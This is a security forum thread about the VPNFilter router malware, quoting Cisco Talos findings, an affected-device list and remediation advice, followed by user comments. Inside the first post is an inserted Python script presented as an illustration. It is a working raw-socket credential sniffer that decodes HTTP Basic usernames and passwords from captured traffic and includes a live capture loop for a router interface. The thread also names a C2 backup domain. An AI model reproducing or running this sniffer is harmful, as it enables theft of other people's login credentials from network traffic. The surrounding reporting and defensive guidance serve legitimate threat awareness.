Malware News VPNFilter Malware Infects 500k Routers Including Linksys, MikroTik, NETGEAR

silversurfer
Thread author

Malware called VPNFilter has infected 500,000 routers from brands including Linksys, MikroTik, NETGEAR and TP-Link, most of them used in home offices. Researchers at Cisco Talos said they decided to warn the public of the threat despite the fact that the infected devices and the malware are still under investigation.

Researchers said their investigation into VPNFilter has been ongoing over the last several months and included both law enforcement and private-sector intelligence partners. “We have not completed our research, but recent events have convinced us that the correct way forward is to now share our findings so that affected parties can take the appropriate action to defend themselves,” researchers wrote in a Wednesday post.

Talos believes the attacks are being perpetrated by state-sponsored or state-affiliated actors and that an attack leveraging those compromised devices could be “imminent.” Researchers can’t say for sure who is behind VPNFilter, but say code used by the malware authors overlaps with BlackEnergy malware used in previous attacks in Ukraine. Currently, VPNFilter malware has been found mostly on devices in Ukraine, but also in 54 additional countries.

“The behavior of this malware on networking equipment is particularly concerning, as components of the VPNFilter malware allows for theft of website credentials and monitoring of Modbus SCADA protocols,” researchers wrote.

Researchers said the malware has destructive capabilities that allow an attacker to either infect a device or render it unusable. “[This] can be triggered on individual victim machines or en masse, and has the potential of cutting off internet access for hundreds of thousands of victims worldwide,” the report stated.

More troubling to researchers, as of Thursday they “observed another substantial increase in newly acquired VPNFilter victims focused in Ukraine.”

The malware itself is multi-staged; in stage one, VPNFilter targets a number of CPU architectures on devices running firmware based on BusyBox and Linux.

“The main purpose of these first-stage binaries is to locate a server providing a more fully featured second stage, and to download and maintain persistence for this next stage on infected devices,” Talos wrote.

Researchers said that this method of achieving persistence differs from other similar IoT malware such as Mirai. The Mirai malware could be removed from a device with a simple reboot. VPNFilter, on the other hand, “is capable of modifying non-volatile configuration memory values and adds itself to crontab, the Linux job scheduler, to achieve persistence,” according to the report.

After the malware has burrowed its way into a system’s memory, it begins to download an image from the image hosting site Photobucket, or from the domain toknowall[.]com as a backup. From the image downloaded, the malware extracts an IP address embedded in the image’s EXIF metadata that is used as a “listener” for the malware to receive instructions to initiate stage two.

“The stage 2 malware first sets up the working environment by creating a modules folder (/var/run/vpnfilterm) and a working directory (/var/run/vpnfilterw). Afterward, it will run in a loop, where it first reaches out to a C2 server, and then executes commands retrieved from the C2,” researchers wrote.

Malicious capabilities of VPNFilter include bricking the host device, executing shell commands for further manipulation, creating a Tor configuration for anonymous access to the device, or maliciously configuring the router’s proxy port and proxy URL to manipulate browsing sessions.

A third stage of the malware has also been observed where attackers leverage as many as two plugin modules – a packet sniffer and a communication plugin. Both leverage Tor to cloak communications. The packet sniffer module is capable of intercepting network traffic through a “raw socket” and looks for strings used in HTTP basic authentication. “This allows the attackers to understand, capture, and track the traffic flowing through the device,” researchers said.

Links to the Russian-speaking actors behind the BlackEnergy APT group were made when Cisco Talos researchers closely examined the malware’s encrypted binaries. “Analysis of this RC4 implementation shows that it is identical to the implementation used in BlackEnergy, which is believed by law enforcement agencies to originate with a state actor,” researchers stated.

“VPNFilter is an expansive, robust, highly capable, and dangerous threat that targets devices that are challenging to defend. Its highly modular framework allows for rapid changes to the actor’s operational infrastructure, serving their goals of misattribution, intelligence collection, and finding a platform to conduct attacks,” Talos researchers said.
 
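The stage-3 sniffer described in the post above needs nothing more than a raw socket and a string search: every HTTP Basic login that crosses an infected router in plaintext hands the operator a username and password. The following is an added example, not code from Talos or from VPNFilter, showing that mechanism end to end on Linux: frames are read from a raw socket (the interface name br0 is an assumption), the Ethernet/IPv4/TCP headers are stripped, and any Authorization: Basic header in the payload is decoded. The frames in SAMPLE_FRAMES are constructed here so the parsing runs offline; sniff_live() is the only part that touches a real network and is never called automatically.

```python
"""
Added example, not Talos's or VPNFilter's code: a minimal Linux raw-socket
credential sniffer of the kind the stage-3 module is described as being.
It parses Ethernet/IPv4/TCP frames, looks for an HTTP Basic Authorization
header in the TCP payload and decodes it. The frames in SAMPLE_FRAMES are
constructed here for offline use; nothing is captured from a real network
unless sniff_live() is called (Linux only, needs root; iface is assumed).
"""
import base64
import re
import socket
import struct

ETH_HDR_LEN = 14
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
# The string a sniffer hunts for; base64 charset only, so garbage never reaches the decoder.
BASIC_RE = re.compile(rb"Authorization:[ \t]*Basic[ \t]+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def tcp_payload(frame: bytes):
    """Return (src_ip, dst_ip, dst_port, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < ETH_HDR_LEN + 20:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None                      # ARP, IPv6, ... are ignored here
    ip = frame[ETH_HDR_LEN:]
    ihl = (ip[0] & 0x0F) * 4             # IPv4 header length incl. options
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != IPPROTO_TCP or len(ip) < ihl + 20 or total_len > len(ip):
        return None
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    tcp = ip[ihl:total_len]
    dport = struct.unpack("!H", tcp[2:4])[0]
    data_off = (tcp[12] >> 4) * 4        # TCP header length incl. options
    return src, dst, dport, tcp[data_off:]


def extract_basic_credentials(payload: bytes):
    """Decode an HTTP Basic header into (user, password); None if absent or malformed."""
    m = BASIC_RE.search(payload)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True)
    except ValueError:                   # binascii.Error is a ValueError: bad padding etc.
        return None
    user, sep, password = decoded.partition(b":")
    if not sep:                          # RFC 7617 requires user-id ":" password
        return None
    return user.decode("latin-1"), password.decode("latin-1")


def harvest(frames):
    """Run every frame through the parser; return the (src, dst, port, user, pw) hits."""
    hits = []
    for frame in frames:
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, dst, dport, payload = parsed
        creds = extract_basic_credentials(payload)
        if creds is not None:
            hits.append((src, dst, dport) + creds)
    return hits


def sniff_live(iface="br0"):
    """Real raw-socket loop as a router-resident sniffer would use it (Linux, root)."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))  # ETH_P_ALL
    sock.bind((iface, 0))
    while True:
        for hit in harvest([sock.recv(65535)]):
            print("credential on the wire:", hit)


def build_frame(src, dst, dport, payload):
    """Constructed test input: Ethernet + IPv4 + TCP with zeroed checksums (parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", 40000, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + tcp
    return b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip


# Constructed sample capture: one plaintext login, one TLS-looking blob, one ARP frame.
SAMPLE_FRAMES = [
    build_frame("10.0.0.7", "192.168.1.1", 80,
                b"GET /login HTTP/1.1\r\nHost: 192.168.1.1\r\n"
                b"Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n"),
    build_frame("10.0.0.7", "93.184.216.34", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),
    b"\x00" * 12 + b"\x08\x06" + b"\x00" * 28,
]

if __name__ == "__main__":
    for hit in harvest(SAMPLE_FRAMES):
        print(hit)
```

Only the plaintext login on port 80 yields a hit; the TLS record on 443 carries no readable header, which is the practical lesson for anyone administering a router from behind a device they do not fully control: an HTTP admin page or any other Basic-auth service reachable through the router gives its credentials away to whoever owns the box.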

upnorth
Moderator

Cisco's Talos Intelligence Group Blog: New VPNFilter malware targets at least 500K networking devices worldwide

Defending against this threat is extremely difficult due to the nature of the affected devices. The majority of them are connected directly to the internet, with no security devices or services between them and the potential attackers. This challenge is augmented by the fact that most of the affected devices have publicly known vulnerabilities which are not convenient for the average user to patch. Additionally, most have no built-in anti-malware capabilities. These three facts together make this threat extremely hard to counter, resulting in extremely limited opportunities to interdict malware, remove vulnerabilities, or block threats.

Despite these challenges, Talos has released protections for this threat from multiple angles, to try to take advantage of the limited options that exist. We developed and deployed more than 100 Snort signatures for the publicly known vulnerabilities for the devices that are associated with this threat. These rules have been deployed in the public Snort set, and can be used by anyone to help defend their devices. In addition, we have done the usual blacklisting of domains/IPs as appropriate and convicting of the hashes associated with this threat to cover those who are protected by the Cisco Security ecosystem. We have reached out to Linksys, Mikrotik, Netgear, TP-Link and QNAP regarding this issue. (Note: QNAP has been aware of certain aspects of VPNFilter and previously done work to counter the threat.) Finally, we have also shared these indicators and our research with international law enforcement and our fellow members of the Cyber Threat Alliance in advance of this publication so they could move quickly to help counter this threat more broadly.

We recommend that:
  • Users of SOHO routers and/or NAS devices reset them to factory defaults and reboot them in order to remove the potentially destructive, non-persistent stage 2 and stage 3 malware.
  • Internet service providers that provide SOHO routers to their users reboot the routers on their customers' behalf.
  • If you have any of the devices known or suspected to be affected by this threat, it is extremely important that you work with the manufacturer to ensure that your device is up to date with the latest patch versions. If not, you should apply the updated patches immediately.
  • ISPs work aggressively with their customers to ensure their devices are patched to the most recent firmware/software versions.
Due to the potential for destructive action by the threat actor, we recommend out of an abundance of caution that these actions be taken for all SOHO or NAS devices, whether or not they are known to be affected by this threat.

The following devices are known to be affected by this threat. Based on the scale of this research, many of our observations are remote and not on the device, so it is difficult to determine specific version numbers and models in many cases. It should be noted that all of these devices have publicly known vulnerabilities associated with them.

Given our observations with this threat, we assess with high confidence that this list is incomplete and other devices could be affected.

LINKSYS DEVICES:

E1200
E2500
WRVS4400N

MIKROTIK ROUTEROS VERSIONS FOR CLOUD CORE ROUTERS:

1016
1036
1072

NETGEAR DEVICES:

DGN2200
R6400
R7000
R8000
WNR1000
WNR2000

QNAP DEVICES:

TS251
TS439 Pro

Other QNAP NAS devices running QTS software

TP-LINK DEVICES:

R600VPN
ForgottenSeer 58943

Those are all crap routers. Also, since they clearly allow user-space manipulation of the router VDOM controllers, they're even worse.

The fact that these routers are HTTP/HTTPS WAN-facing (admin) is even more reckless. The most basic protection is to keep your router administration at the LAN level and, if needed, use a VPN to jack into your LAN from remote to access router admin. If the router has nothing facing the WAN, there is nothing for a malicious actor to hack. If the router protects its user space and doesn't allow space execution, it's even harder (if not impossible) to hack.

So bad IT.. Poor quality hardware. In concert = Disaster.
ForgottenSeer 69673

Some internet providers tell their customers not to update the firmware because it will interfere with the service.

ForgottenSeer 69673

I checked my router and it has the latest firmware but am wondering if I should reflash it anyway?